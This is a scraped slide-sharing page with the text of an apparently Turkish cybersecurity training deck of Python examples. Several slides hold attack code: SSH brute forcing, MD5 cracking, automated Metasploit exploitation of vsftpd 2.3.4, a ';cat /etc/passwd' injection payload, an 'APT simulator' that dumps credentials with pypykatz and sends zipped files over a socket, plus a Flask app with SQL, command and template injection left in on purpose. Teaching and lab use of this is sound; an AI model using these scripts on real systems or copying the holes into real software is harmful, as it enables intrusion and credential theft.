Writing and Publishing Puppet Modules - PuppetConf 2014Writing and Publishing Puppet Modules - PuppetConf 2014
Writing and Publishing Puppet Modules - PuppetConf 2014Puppet
 
Building Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEisBuilding Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEisFIWARE
 

Similaire à uygulamalarla siber güvenlik-siber guvenlik haftasi.pptx (20)

Chat code
Chat codeChat code
Chat code
 
Python from zero to hero (Twitter Explorer)
Python from zero to hero (Twitter Explorer)Python from zero to hero (Twitter Explorer)
Python from zero to hero (Twitter Explorer)
 
Jakob Holderbaum - Managing Shared secrets using basic Unix tools
Jakob Holderbaum - Managing Shared secrets using basic Unix toolsJakob Holderbaum - Managing Shared secrets using basic Unix tools
Jakob Holderbaum - Managing Shared secrets using basic Unix tools
 
Service intergration
Service intergration Service intergration
Service intergration
 
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
 
Build resource server &amp; client for OCF Cloud (2018.8.30)
Build resource server &amp; client for OCF Cloud (2018.8.30)Build resource server &amp; client for OCF Cloud (2018.8.30)
Build resource server &amp; client for OCF Cloud (2018.8.30)
 
Cs pritical file
Cs pritical fileCs pritical file
Cs pritical file
 
Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)
 
Facebook Cracker
Facebook CrackerFacebook Cracker
Facebook Cracker
 
Consider the fork_examplec code under Example code for pr.pdf
Consider the fork_examplec code under Example code for pr.pdfConsider the fork_examplec code under Example code for pr.pdf
Consider the fork_examplec code under Example code for pr.pdf
 
UDP.yash
UDP.yashUDP.yash
UDP.yash
 
Best Practices in Handling Performance Issues
Best Practices in Handling Performance IssuesBest Practices in Handling Performance Issues
Best Practices in Handling Performance Issues
 
Python Network Programming – Course Applications Guide
Python Network Programming – Course Applications GuidePython Network Programming – Course Applications Guide
Python Network Programming – Course Applications Guide
 
Introduction to GitHub Actions
Introduction to GitHub ActionsIntroduction to GitHub Actions
Introduction to GitHub Actions
 
macOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswift
macOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswiftmacOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswift
macOS アプリで Swift Package Manager を使ってみる #love_swift #hakataswift
 
Controlling robots using javascript
Controlling robots using javascriptControlling robots using javascript
Controlling robots using javascript
 
Princeton Wintersession: Software Quality Assurance Tooling
Princeton Wintersession: Software Quality Assurance ToolingPrinceton Wintersession: Software Quality Assurance Tooling
Princeton Wintersession: Software Quality Assurance Tooling
 
iOS build that scales
iOS build that scalesiOS build that scales
iOS build that scales
 
Writing and Publishing Puppet Modules - PuppetConf 2014
Writing and Publishing Puppet Modules - PuppetConf 2014Writing and Publishing Puppet Modules - PuppetConf 2014
Writing and Publishing Puppet Modules - PuppetConf 2014
 
Building Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEisBuilding Your Own IoT Platform using FIWARE GEis
Building Your Own IoT Platform using FIWARE GEis
 

Dernier

Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Principled Technologies
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024SynarionITSolutions
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 

Dernier (20)

Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 

uygulamalarla siber güvenlik-siber guvenlik haftasi.pptx

  • 2. ENVANTER YÖNETIMI # -*- coding: utf-8 -*- import socket import subprocess banner_liste=[] IP=raw_input("Ip adresini giriniz:") baslangic_port=input("Baslangic port:") bitis_port=input("Bitis port:") for port in range(baslangic_port,bitis_port): try: soket = socket.socket() soket.connect((IP,port)) banner=str(soket.recv(1024)) print "[+]Port:",str(port) print "[+]Banner:",banner banner_liste.append(str(banner)) https://raw.githubusercontent.com/kaleakademi/siber-guvenlik-icin-python-egitimi/main/socketuygulama.py
  • 3. ENVANTER YÖNETIMI if port == 22: print "Bu sistem linux veya bir ağ cihazı olabilir" dosya= open("linux.txt","r") icerik = dosya.read() dosya.close() if not str(IP) in icerik: dosya = open("linux.txt","a") veri= IP+"n" dosya.write(veri) dosya.close() print "Yeni IP adresi kontrolü" dosya = open("yeni_ip.txt","r") icerik = dosya.read() dosya.close() if not str(IP) in icerik: dosya = open("yeni_ip.txt","a") veri = IP+"n" dosya.write(veri) dosya.close() https://raw.githubusercontent.com/kaleakademi/siber-guvenlik-icin-python-egitimi/main/socketuygulama.py
  • 4. CEASER ŞIFRELEME def ceasarSifreleme(yazi,otelemeMiktari): sifreyazi = "" yaziListe = [] yaziSayi = [] yaziListe = list(yazi) #print yaziListe for i in yaziListe: yaziSayi = ord(i) + otelemeMiktari sifreyazi = sifreyazi + chr(yaziSayi) return sifreyazi https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/Ceaser.py
  • 5. CEASER ŞIFRELEME def ceasarSifreCoz(yazi): duzyazi = "" yaziListe = [] yaziSayi = [] yaziListe = list(yazi) #print yaziListe for otelemeMiktari in range(1,29): for i in yaziListe: yaziSayi = ord(i) - otelemeMiktari duzyazi = duzyazi + chr(yaziSayi) print str(otelemeMiktari)+" harf kadar ötelenmiş düz metin : "+ duzyazi duzyazi="" print "----Sezar Şifreleme----" ceasarSifre=ceasarSifreleme("merhaba",3) print "Şifreli metin : "+ceasarSifre print "----Sezar Şifre Çözme----" ceasarSifreCoz(ceasarSifre) https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/Ceaser.py
  • 6. IÇERIK KONTROLÜ # -*- coding: utf-8 -*- import requests import smtplib import time while 1: time.sleep(60) response=requests.get('https://a.wordpress.com') responseIcerik=response.content kontrol = 0 dosya = open('icerik.txt','r') dosyaIcerik=dosya.readlines() dosya.close() for i in dosyaIcerik: if str(i).split("n")[0] in responseIcerik: kontrol = kontrol + 1 https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/icerikKontrol.py
  • 7. IÇERIK KONTROLÜ if len(dosyaIcerik) == kontrol: print "Web sayfasında değişiklik yok." else: print "Web sayfasında değişiklik yapılmıştır." try: gonderici = 'a@gmail.com' alici = 'a@gmail.com' mesaj = 'Web sayfasının içeriği değişti' username = 'a@gmail.com' password = '*****' server = smtplib.SMTP('smtp.gmail.com:587') server.starttls() server.login(username, password) server.sendmail(gonderici, alici, mesaj) server.quit() print "Mail gönderildi" except: print "Mail gönderilemedi" https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/icerikKontrol.py
  • 8. HASH KONTROLÜ import itertools import hashlib karakterSeti='abcdefghijklmnoprstuvyz' karakter=raw_input("Max kac karakter olacak: ") md5=raw_input("Md5 giriniz: ") for i in range(1,int(karakter)+1,1): sonuc=itertools.combinations_with_replacement(karakt erSeti,i) for password in sonuc: if md5==hashlib.md5(''.join(password)).hexdigest(): print "Sifre: ",str(''.join(password)) https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/md5tanSifreye.py
  • 9. RAINBOW TABLE OLUSTURUCU import itertools import hashlib sozlukListe=[[],[]] karakterSeti='ab12' karakter=raw_input("Max kac karakter olacak: ") for i in range(1,int(karakter)+1,1): sonuc=itertools.combinations_with_replacement(karakterSeti,i) for password in sonuc: sozlukListe[0].append(''.join(password)) sozlukListe[1].append(hashlib.md5(''.join(password)).hexdigest()) #print hashlib.md5(''.join(password)).hexdigest() print "Sozluk:",sozlukListe[0] print "Hashler:",sozlukListe[1] https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/rainbowOlustur.py
  • 10. SSH KABA KUVVET SALDIRISI import paramiko client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) Username=["siber","guvenlik"] Password=["siber","guvenlik"] for i in Username: for j in Password: try: sonuc=client.connect('192.168.50.50', username=i, password=j) #print sonuc client.close() print "Username: ",i," Password: ",j except: print "Username: ",i," Password: ",j,"baglanti yapilamadi" https://github.com/anil-yelken/siber-guvenlik-icin-python/blob/main/sshBruteForce.py
  • 11. SSH KONTROL import paramiko ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy( paramiko.AutoAddPolicy()) ssh.connect('127.0.0.1', username='kali', password='kali') stdin, stdout, stderr = ssh.exec_command("""grep "sudo" /etc/group|cut -d ":" -f4""") print("Sudo grubundaki kullanıcılar:") print(stdout.read()) https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/ssh_kontrol.py
  • 12. OTOMATIK MSFCONSOLE if "vsFTPd 2.3.4" in i: print "[+]Service: ",i print "[+]Metasploit exploit: exploit/unix/ftp/vsftpd_234_backdoor" if automaticExploit == "True": try: rc="""use exploit/unix/ftp/vsftpd_234_backdoor set RHOST rhost set RPORT 21 exploit""" rc=rc.replace("rhost",str(IP)) path=subprocess.check_output("pwd",shell=True).spli tlines()[0] path=path+"/vsFTPd2-3-4.rc" dosya=open(path,"w") dosya.write(rc) dosya.close() komut="xterm -e msfconsole -r "+str(path) subprocess.Popen(komut,shell=True,stdout=subproce ss.PIPE) except: print "Failed to exploit " https://github.com/anil-yelken/automatic-exploit/blob/main/automatic-exploit.py
  • 13. WEB ZAFIYET TARAMASI def commandInjection(url,dosyaAdi): try: deger = url.find("=") istek = url[:deger + 1] + ";cat%20/etc/passwd" sonuc = requests.get(istek, verify=False) if "www-data" in sonuc.content: print "[+]Command injection possible, payload: ;cat%20/etc/passwd" print "Response: ", sonuc.content rapor = open(dosyaAdi, "a") raporIcerik="[+]Command injection possible, payload: ;cat%20/etc/passwdn" raporIcerik += "Response: " + sonuc.content + "n" rapor.write(raporIcerik) rapor.close() https://github.com/anil-yelken/web-vulnerability-scanner/blob/main/web-vulnerability-scanner.py
  • 14. NESSUS OTOMASYONU import requests accessKey="8caddd5ad72d86c509982ca2a3229f426883386b0780c114d275fdd8d5829c 97" secretKey="a53754e51fa487075a67832f885a3953cc3854620da3b8212ab3acfcf50901c5 " xapikeys="accessKey="+accessKey+"; secretKey="+secretKey+";" header={"X-ApiKeys":xapikeys} url="https://127.0.0.1:8834/folders" sonuc= requests.get(url=url,headers=header,verify=False) for i in sonuc.json()['folders']: print i['name'] https://raw.githubusercontent.com/kaleakademi/siber-guvenlik-icin-python-egitimi/main/nessus1.py
  • 15. NESSUS OTOMASYONU url="https://127.0.0.1:8834/scans" sonuc= requests.get(url=url,headers=header,verify=False) for i in sonuc.json()['scans']: #print i if "Host Discovery" in str(i['name']): url="https://127.0.0.1:8834/scans/"+str(i['id']) sonuc= requests.get(url=url,headers=header,verify=False) for j in sonuc.json()['hosts']: dosya_adi=str(i['name'])+"_ipler.txt" veri=str(j['hostname'])+"n" dosya=open(dosya_adi,"a") dosya.write(veri) dosya.close() https://github.com/kaleakademi/siber-guvenlik-icin-python-egitimi/blob/main/nessus2.py
  • 16. NESSUS OTOMASYONU url="https://127.0.0.1:8834/scans/"+str(i['id'])+"/hosts/"+str(j['host_id']) IP_sonuc= requests.get(url=url,headers=header,verify=False) for k in IP_sonuc.json()['vulnerabilities']: plugin_id=k['plugin_id'] url="https://127.0.0.1:8834/plugins/plugin/"+str(plugin_id) plugin_sonuc= requests.get(url=url,headers=header,verify=False) if str(plugin_sonuc.json()['id']) in "11936": for plugin in plugin_sonuc.json()['attributes']: if "os_identification" in plugin['attribute_name']: print str(j['hostname']) print IP_sonuc.json()['info']['operating-system'] https://github.com/kaleakademi/siber-guvenlik-icin-python-egitimi/blob/main/nessus2.py
  • 17. NESSUS OTOMASYONU for i in sonuc.json()['scans']: if "Host Discovery" in i['name'] and "completed" in i['status']: url="https://"+IP+":8834/scans/"+str(i['id']) sonuc=requests.get(url=url,headers=header,verify=False) for j in sonuc.json()['hosts']: if not j['hostname'] in iplerListe: conn=sqlite3.connect('hostDiscovery.db') c=conn.cursor() c.execute('INSERT INTO hosts VALUES (?,?)',(str(j['hostname']),str(datetime.datetime.now()))) conn.commit() conn.close() print "New IP:",j['hostname'] s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((SIEMhost,SIEMport)) message="New host:"+j['hostname'] s.sendall(message) s.close() https://github.com/anil-yelken/Nessus-Automation/blob/main/finding-new-ip-nessus.py
  • 18. SIBER GÜVENLIK KONTROL DOĞRULAMA PLATFORMU https://github.com/anil-yelken/cyber-security-control-validation- platform
  • 19. SIBER GÜVENLIK KONTROL DOĞRULAMA PLATFORMU sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: result = sock.connect_ex((vulnerable_ip,8000)) if result == 0: print("Vulnerable SOAP service is running") else: print("Vulnerable SOAP service isn't running") except: pass
  • 20. SIBER GÜVENLIK KONTROL DOĞRULAMA PLATFORMU print("SOAP SQL injection is testing...") try: result=client.service.query("' or '1=1") #print(result) if "test" in result and "erlik" in result: successful_attack+=1 print("Successful attack") else: unsuccessful_attack+=1 print("Unsuccessful attack") except: unsuccessful_attack+=1 print("Unsuccessful attack") pass print("SOAP SQL injection is finished.")
  • 21. SIBER GÜVENLIK KONTROL DOĞRULAMA PLATFORMU @rpc(String , _returns=String) def query(ctx, name): con = sqlite3.connect("test.db") cur = con.cursor() cur.execute("select * from test where username = '%s'" % name ) data=str(cur.fetchall()) con.close() import logging logging.basicConfig(filename="soap_server.log", filemode='w', level=logging.DEBUG) logging.debug(data) return(data)
  • 22. BAYANAY - PYTHON WARDRIVING ARACI https://github.com/anil-yelken/wardriving
  • 23. BAYANAY - PYTHON WARDRIVING ARACI from selenium import webdriver import time import datetime driver = webdriver.Firefox() driver.get("https://www.geody.com") driver.find_element_by_id("cookieChoiceDismiss").click() while 1: driver.find_element_by_xpath("/html/body/table[1]/tbody/tr/td[1]/a").click() time.sleep(10) konum=str(driver.current_url).split("&")[1:] print konum log=str(konum[0])+"|"+str(konum[1])+"|"+str(datetime.datetime.now().strftime("%d %B %Y %I:%M%p"))+"n" dosya=open("location.txt","a") dosya.write(log) dosya.close() driver.refresh()
  • 24. BAYANAY - PYTHON WARDRIVING ARACI from scapy.all import * import datetime ssidListe = [] def SSIDBul(pkt) : if pkt.haslayer(Dot11Beacon) : ssid = str(pkt.info) mac = str(pkt.addr2) if not ssid in ssidListe: ssidListe.append(ssid) print "Mac: ",mac," SSID: ",ssid log=str(datetime.datetime.now().strftime("%d %B %Y %I:%M%p"))+"|"+str(mac)+"|"+str(ssid)+"n" dosya=open("ssid.txt","a") dosya.write(log) dosya.close() sniff(iface="wlan0", prn = SSIDBul)
  • 26. APT SIMULATOR try: ipconfig=subprocess.check_output("ipconfig /all",shell=True) with open("ipconfig.txt", 'wb') as file: file.write(ipconfig) except: pass try: os.system("pip3 install pypykatz") except: pass try: os.system("pypykatz.py rekall dump -t 0") print("pypykatz is finished.") except: pass
  • 27. APT SIMULATOR try: file_zip = zipfile.ZipFile('file.zip', 'w') for folder, subfolders, files in os.walk('.'): for file in files: if file.endswith('.txt'): file_zip.write(os.path.join(folder, file), os.path.relpath(os.path.join(folder, file), '.'), compress_type=zipfile.ZIP_DEFLATED) file_zip.close() print("Files are compressed.") s = socket.socket() s.connect(("127.0.0.1", 80)) with open("file.zip", "rb") as f: while True: bytes_read = f.read(4096) if not bytes_read: break s.sendall(bytes_read) s.close() print("Zip file sent.") except: pass
  • 28. APT SIMULATOR import socket s = socket.socket() s.bind(("0.0.0.0", 80)) s.listen() client_socket, address = s.accept() print(f"[+] {address} is connected.") with open("received_file.zip", "wb") as f: while True: bytes_read = client_socket.recv(4096) if not bytes_read: break f.write(bytes_read) client_socket.close() s.close()
  • 30. PYWIRT import winrm with open('cred_list.txt') as f: lines = f.readlines() for line in lines: IP_address=line.split("|")[0] user=line.split("|")[1] passw=line.split("|")[2].split("n")[0] print(IP_address,"-",user,"-",passw,"-") winrm_session = winrm.Session(IP_address, auth=(user, passw)) try: print("IP Configuration:") result = winrm_session.run_cmd('ipconfig', ['/all']) for result_line in result.std_out.decode('ascii').split("rn"): print(result_line) except: pass
  • 32. PYLIRT import paramiko with open('cred_list.txt') as f: lines = f.readlines() for line in lines: IP_address=line.split("|")[0] user=line.split("|")[1] passw=line.split("|")[2].split("n")[0] print(IP_address,"-",user,"-",passw) ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(IP_address, username=user, password=passw) try: stdin, stdout, stderr = ssh.exec_command("""cat /etc/passwd""") print("/etc/passwd:n",stdout.read().decode()) except: pass
  • 34. SOAR def send_mail(from_message,to_message,message,username,password,SMTP_server): try: import smtplib server = smtplib.SMTP(SMTP_server) server.starttls() server.login(username, password) server.sendmail(from_message, to_message, message) server.quit() print("Mail sent successfully") except: print("Mail sent failed")
  • 35. SOAR def send_message(nexmo_key,nexmo_Secret,from_message,to_message,text): try: import nexmo client = nexmo.Client(key=nexmo_key, secret=nexmo_Secret) response = client.send_message( { "from": from_message, "to": to_message, "text": text, } ) if response["messages"][0]["status"] == "0": print("Message sent successfully") else: print("Message sent failed") except: print("Message sent failed")
  • 36. SOAR def alienvault_control(OTX_key,find_word): from OTXv2 import OTXv2 otx = OTXv2(OTX_key) for i in (otx.getall()): try: id = str(i['id']) except: id = "" try: name = str(i['name']) except: name = "" try: description = str(i['description']) except: description = ""
  • 37. SOAR def staxx_ip_control(username,password,staxx_URL): import requests import json header = {'Content-Type': 'application/json'} veri = {"username": username, "password": password} url = staxx_URL + '/api/v1/login' response = requests.post(url=url, headers=header, data=json.dumps(veri), verify=False) token = response.json()['token_id'] data = {"token": str(token), "query": "confidence>70", "type": "json", "size": 10} url = staxx_URL + "/api/v1/intelligence" result = requests.post(url=url, headers=header, data=json.dumps(data), verify=False) return result
  • 38. OWASP – VULNERABLE FLASK APP -HTML Injection -SSTI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization -Broken Authentication -DOS -File Upload https://github.com/anil-yelken/Vulnerable-Flask-App
  • 39. OWASP – VULNERABLE FLASK APP SQL INJECTION @app.route("/user/<string:name>") def search_user(name): con = sqlite3.connect("test.db") cur = con.cursor() cur.execute("select * from test where username = '%s'" % name) data = str(cur.fetchall()) con.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200
  • 40. OWASP – VULNERABLE FLASK APP SQL INJECTION
  • 41. OWASP – VULNERABLE FLASK APP HTML INJECTION @app.route("/welcome2/<string:name>") def welcome2(name): data="Welcome "+name return data
  • 42. OWASP – VULNERABLE FLASK APP HTML INJECTION
  • 43. OWASP – VULNERABLE FLASK APP SSTI @app.route("/hello") def hello_ssti(): if request.args.get('name'): name = request.args.get('name') template = f'''<div> <h1>Hello</h1> {name} </div> ''' import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(template)) return render_template_string(template)
  • 44. OWASP – VULNERABLE FLASK APP SSTI
  • 45. OWASP – VULNERABLE FLASK APP COMMAND INJECTION @app.route("/get_users") def get_users(): try: hostname = request.args.get('hostname') command = "dig " + hostname data = subprocess.check_output(command, shell=True) return data except: data = str(hostname) + " username didn't found" return data
  • 46. OWASP – VULNERABLE FLASK APP COMMAND INJECTION
  • 47. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_log/") def get_log(): try: command="cat restapi.log" data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="Command didn't run"), 200
  • 48. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
  • 49. OWASP – VULNERABLE FLASK APP LFI @app.route("/read_file") def read_file(): filename = request.args.get('filename') file = open(filename, "r") data = file.read() file.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(data)) return jsonify(data=data),200
  • 50. OWASP – VULNERABLE FLASK APP LFI
  • 51. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_admin_mail/<string:control>") def get_admin_mail(control): if control=="admin": data="admin@cybersecurity.intra" import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200 else: return jsonify(data="Control didn't set admin"), 200
  • 52. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
  • 53. OWASP – VULNERABLE FLASK APP BRUTE FORCE @app.route('/login',methods=["GET"]) def login(): username=request.args.get("username") passwd=request.args.get("password") if "anil" in username and "cyber" in passwd: return jsonify(data="Login successful"), 200 else: return jsonify(data="Login unsuccessful"), 403
  • 54. OWASP – VULNERABLE FLASK APP BRUTE FORCE
  • 55. OWASP – VULNERABLE FLASK APP FILE UPLOAD @app.route('/upload', methods = ['GET','POST']) def uploadfile(): import os if request.method == 'POST': f = request.files['file'] filename=secure_filename(f.filename) f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) return 'File uploaded successfully' else: return ''' <html> <body> <form method = "POST" enctype = "multipart/form-data"> <input type = "file" name = "file" /> <input type = "submit"/> </form> </body> </html> '''
  • 56. OWASP – VULNERABLE FLASK APP FILE UPLOAD
  • 57. OWASP – VULNERABLE FLASK APP DOS @app.route("/user_pass_control") def user_pass_control(): import re username=request.form.get("username") password=request.form.get("password") if re.search(username,password): return jsonify(data="Password include username"), 200 else: return jsonify(data="Password doesn't include username"), 200
  • 58. OWASP – VULNERABLE FLASK APP DOS
